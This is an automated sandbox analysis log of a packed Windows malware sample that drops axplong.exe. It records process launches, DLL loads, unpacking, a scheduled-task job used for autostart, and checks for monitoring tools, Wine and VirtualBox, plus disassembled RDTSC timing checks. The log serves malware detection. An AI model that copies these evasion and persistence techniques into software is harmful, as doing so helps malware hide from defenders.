Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe" Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: mstask.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: dui70.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: duser.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: chartv.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: oleacc.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: atlthunk.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: windows.fileexplorer.common.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32 Jump to behavior
Source: 9ICG2PuZbG.exe Static file information: File size 1897984 > 1048576
Source: 9ICG2PuZbG.exe Static PE information: Raw size of pcxsfzhs is bigger than: 0x100000 < 0x19da00

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Unpacked PE file: 1.2.9ICG2PuZbG.exe.160000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 2.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 3.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Unpacked PE file: 9.2.axplong.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;pcxsfzhs:EW;plzfkdac:EW;.taggant:EW;
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: axplong.exe.1.dr Static PE information: real checksum: 0x1d101c should be: 0x1d2453
Source: 9ICG2PuZbG.exe Static PE information: real checksum: 0x1d101c should be: 0x1d2453
PE file contains sections with non-standard names
Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: 9ICG2PuZbG.exe Static PE information: section name: .idata
Source: 9ICG2PuZbG.exe Static PE information: section name:
Source: 9ICG2PuZbG.exe Static PE information: section name: pcxsfzhs
Source: 9ICG2PuZbG.exe Static PE information: section name: plzfkdac
Source: 9ICG2PuZbG.exe Static PE information: section name: .taggant
Source: axplong.exe.1.dr Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name: .idata
Source: axplong.exe.1.dr Static PE information: section name:
Source: axplong.exe.1.dr Static PE information: section name: pcxsfzhs
Source: axplong.exe.1.dr Static PE information: section name: plzfkdac
Source: axplong.exe.1.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 9_2_00BFD84C push ecx; ret 9_2_00BFD85F
Source: 9ICG2PuZbG.exe Static PE information: section name: entropy: 7.977259343253602
Source: 9ICG2PuZbG.exe Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Source: axplong.exe.1.dr Static PE information: section name: entropy: 7.977259343253602
Source: axplong.exe.1.dr Static PE information: section name: pcxsfzhs entropy: 7.95412617888117
Drops PE files
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Jump to dropped file

Boot Survival
barindex
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Creates job files (autostart)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File created: C:\Windows\Tasks\axplong.job Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33B3E1 second address: 33B3E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33B3E5 second address: 33B3F7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jo 00007F3A9502B5ECh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33B3F7 second address: 33B41C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F3A94CD4095h 0x0000000a jmp 00007F3A94CD4089h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33B41C second address: 33B439 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F3A9502B5ECh 0x0000000c jg 00007F3A9502B5E6h 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3476B7 second address: 3476D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A94CD4088h 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347B28 second address: 347B5D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F3A9502B5F4h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347CC2 second address: 347CC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347CC6 second address: 347CE4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F3A9502B5F4h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347CE4 second address: 347CE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347E86 second address: 347EA2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 je 00007F3A9502B5E6h 0x00000009 jmp 00007F3A9502B5EEh 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347EA2 second address: 347EA6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347EA6 second address: 347EEA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3A9502B5F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007F3A9502B5E8h 0x00000012 push edx 0x00000013 pop edx 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F3A9502B5F5h 0x0000001b jnc 00007F3A9502B5E6h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 347EEA second address: 347EEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34ABBF second address: 34ABCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F3A9502B5E6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34ABCD second address: 34ABDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 popad 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34ABDE second address: 34ABFD instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3A9502B5E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [eax] 0x0000000d push ecx 0x0000000e pushad 0x0000000f jmp 00007F3A9502B5EEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34ABFD second address: 34AC0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pushad 0x0000000e popad 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34AC0D second address: 34AC2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3A9502B5F9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34ADBF second address: 34ADC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34AE17 second address: 34AED3 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F3A9502B5F1h 0x00000008 jmp 00007F3A9502B5EBh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 jmp 00007F3A9502B5F2h 0x00000017 push 00000000h 0x00000019 call 00007F3A9502B5EBh 0x0000001e sub ecx, dword ptr [ebp+122D2B52h] 0x00000024 pop ecx 0x00000025 push A3B43380h 0x0000002a jg 00007F3A9502B5F2h 0x00000030 add dword ptr [esp], 5C4BCD00h 0x00000037 push ecx 0x00000038 mov edx, esi 0x0000003a pop esi 0x0000003b push 00000003h 0x0000003d mov edx, dword ptr [ebp+122D2BB2h] 0x00000043 push 00000000h 0x00000045 movzx edx, cx 0x00000048 push 00000003h 0x0000004a call 00007F3A9502B5F0h 0x0000004f mov dword ptr [ebp+122D2EF0h], eax 0x00000055 pop ecx 0x00000056 call 00007F3A9502B5E9h 0x0000005b jmp 00007F3A9502B5F5h 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F3A9502B5F5h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 34AED3 second address: 34AF21 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F3A94CD4076h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 pushad 0x00000011 jmp 00007F3A94CD4089h 0x00000016 pushad 0x00000017 push edi 0x00000018 pop edi 0x00000019 jg 00007F3A94CD4076h 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [eax] 0x00000023 push eax 0x00000024 push edx 0x00000025 push ebx 0x00000026 jmp 00007F3A94CD4083h 0x0000002b pop ebx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 35BFDE second address: 35BFE8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 331236 second address: 33123B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3692DA second address: 3692DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3692DE second address: 369301 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007F3A94CD4084h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push edx 0x00000011 pop edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369301 second address: 369322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jbe 00007F3A9502B600h 0x0000000b jmp 00007F3A9502B5F4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36976B second address: 36976F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B39 second address: 369B3E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B3E second address: 369B54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 jg 00007F3A94CD4078h 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B54 second address: 369B5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B5E second address: 369B62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 369B62 second address: 369B68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36A157 second address: 36A15B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604AB second address: 3604B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604B3 second address: 3604B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604B7 second address: 3604C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 3604C0 second address: 3604C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 33EC23 second address: 33EC2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F3A9502B5E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36A53B second address: 36A547 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F3A94CD4076h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\9ICG2PuZbG.exe RDTSC instruction interceptor: First address: 36AC37 second address: 36AC3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
